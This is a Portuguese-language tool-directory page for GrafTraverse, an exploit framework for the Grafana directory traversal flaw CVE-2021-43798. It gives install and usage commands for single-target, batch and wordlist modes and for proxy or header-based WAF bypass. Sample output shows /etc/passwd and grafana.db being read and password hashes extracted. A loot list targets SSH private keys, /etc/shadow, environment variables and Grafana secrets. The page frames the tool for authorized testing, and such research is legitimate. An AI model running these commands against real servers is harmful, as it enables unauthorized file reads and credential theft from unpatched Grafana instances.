Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Framework de Exploração

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GrafTraverse - Framework de Exploração Mini para CVE-2021-43798

Ferramenta de automação por linha de comando para testes de segurança autorizados da vulnerabilidade de Directory Traversal do Grafana (CVE-2021-43798).


Visão Geral

Banner

CVE-2021-43798 é uma vulnerabilidade de directory traversal não autenticada no Grafana 8.x que permite que atacantes leiam arquivos arbitrários no sistema de arquivos subjacente através do endpoint /public/plugins/. A causa raiz é a sanitização inadequada de caminhos em requisições de ativos de plugins, permitindo que sequências ../ escapem do diretório pretendido.

GrafTraverse é uma reescrita completa do proof-of-concept original. Ele corrige bugs críticos de manipulação de requisições, adiciona varredura em lote multi-thread, descoberta automática de plugins, extração de credenciais e relatórios estruturados — tornando-se uma ferramenta de nível de produção para equipes de red team e testadores de penetração.


Funcionalidades


Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Garanta que requests esteja disponível (vem com o Kali)
pip3 install requests

# Torne executável
chmod +x GrafTraverse.py

Uso

O GrafTraverse usa uma CLI baseada em subcomandos. Todos os comandos suportam --help.

1. Alvo Único Interativo

Inicie o menu interativo contra um host:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 MODO INTERATIVO
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Caminho personalizado
 5. Saque automatizado completo
 6. Escanear plugins
 7. Sair
============================================================

2. Varredura de Plugins

Identifique rapidamente qual endpoint de plugin está vulnerável sem exploração:

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. Varredura em Lote

Carregue alvos de um arquivo e processe-os concorrentemente:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

Formato do targets.txt:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Linhas começando com # são ignoradas

4. Enumeração com Wordlist

Forneça uma lista de arquivos personalizada para traversal profundo:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. Proxy e Cabeçalhos Personalizados

Roteie através do Burp Suite e adicione cabeçalhos personalizados:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

Referência de Comandos

single

batch

BandeiraDescrição
-l, --listArquivo com URLs de alvo (obrigatório)
--workersThreads concorrentes (padrão: 5)
(todas as bandeiras de single suportadas)

scan

BandeiraDescrição
-u, --urlURL do alvo (obrigatório)
(todas as bandeiras de rede suportadas)

Exemplo de Saída

Recuperação Bem-sucedida de Arquivo

root@kitploit:~
[+] Saída: 20260526_GrafTraverse
[*] Testando: /etc/passwd (via alertlist)
[+] SUCESSO: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Salvo: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Extração de Hash do Grafana DB

root@kitploit:~
[*] Testando: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCESSO: /var/lib/grafana/grafana.db (98304 bytes)
[+] Salvo: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extraídos 3 hashes de senha:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

Arquivos Alvo (Saque Automatizado)

A sequência de saque embutida tenta recuperar os seguintes arquivos em ordem:


Versões Afetadas

  • Grafana 8.0.0 até 8.3.0
  • Corrigido nas versões 8.3.1 e 7.5.12
Baixar ferramenta
FuncionalidadeDescrição
Força Bruta Multi-PluginSonda automaticamente mais de 40 plugins embutidos para encontrar um caminho vulnerável
Modo InterativoModo menu-driven para exploração de alvo único com pré-visualização de arquivos ao vivo
Modo LoteVarredura concorrente de múltiplos alvos com workers configuráveis
Modo WordlistEnumeração profunda de arquivos usando wordlists personalizadas
Extração Automática de HashesExtrai automaticamente hashes de senha PBKDF2 do grafana.db baixado
Registro EstruturadoExporta resultados para JSON e CSV para relatórios contínuos
Suporte a ProxyRoteia tráfego através do Burp, ZAP ou qualquer proxy HTTP (--proxy)
Cabeçalhos PersonalizadosInjeta cabeçalhos arbitrários para bypass de WAF ou tokens de autenticação (-H)
Personalização de TraversalSubstitui profundidade de traversal padrão para ambientes não padrão (--depth)
Filtragem InteligenteElimina falsos positivos rejeitando respostas de JS/CSS/HTML de plugins
Zero DependênciasRequer apenas requests (pré-instalado no Kali / Parrot)
BandeiraDescrição
-u, --urlURL do alvo (obrigatório)
--no-downloadModo somente visualização, não salva arquivos
-t, --timeoutTempo limite da requisição em segundos (padrão: 10)
--proxyURL do proxy HTTP/HTTPS
-H, --headerCabeçalho personalizado (repetível)
--depthString de traversal (padrão: ../../../../../../../../)
--output-dirDiretório para salvar arquivos recuperados
--jsonAnexa resultados ao arquivo de log JSON
--csvAnexa resultados ao arquivo de log CSV
--wordlistArquivo contendo caminhos a enumerar
--pluginForça um nome de plugin específico
ArquivoTipoSensibilidade
/etc/passwdTextoEnumeração de usuários
/etc/shadowTextoHashes de senha (raramente legível)
/etc/hostsTextoTopologia de rede
/etc/hostnameTextoIdentificação do host
/etc/grafana/grafana.iniTextoSegredos do Grafana e credenciais do BD
/var/lib/grafana/grafana.dbBinárioSQLite DB com hashes de usuário e chaves de API
/var/log/grafana/grafana.logTextoInteligência operacional
/root/.ssh/id_rsaTextoChave privada SSH
/root/.ssh/authorized_keysTextoMapeamento de acesso baseado em chave
/proc/self/environTextoVariáveis de ambiente do processo
/proc/self/cmdlineTextoArgumentos do processo
/proc/versionTextoVersão do kernel
/proc/mountsTextoLayout do sistema de arquivos
/etc/os-releaseTextoIdentificação do SO
/etc/issueTextoIdentificação do SO
/etc/crontabTextoTarefas agendadas
/etc/resolv.confTextoConfiguração de DNS